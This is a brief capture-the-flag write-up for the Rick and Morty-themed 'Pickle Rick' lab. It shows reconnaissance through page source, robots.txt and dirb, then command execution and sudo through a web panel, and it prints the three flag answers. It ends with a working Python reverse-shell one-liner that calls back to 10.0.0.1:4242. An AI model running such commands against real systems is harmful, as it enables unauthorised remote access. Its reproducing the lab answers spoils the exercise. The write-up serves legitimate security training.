Pickle Rick - A Rick and Morty CTF

First ingredient

Looking at html source we see username @R1ckRul3s@ commented. At robots.txt we see weird text @Wubbalubbadubdub@

with dirb we can find @/login.php@

Now we have command panel access and can send simple commands into server.

with @ls -l@ we see @Sup3rS3cretPickl3Ingred.txt@. we cannot use @cat@ but @less@ works, and we get the first ingredient.

mr. meeseek hair

Second ingredient

@less “/home/rick/second ingredients”@

jerry tear

Third ingredient

I realised that we are sudoers, so we can just simply:

@sudo less /root/3rd.txt@

fleeb juice

Reverse Shell

We can also spawn reverse shell with:

@python3 -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’@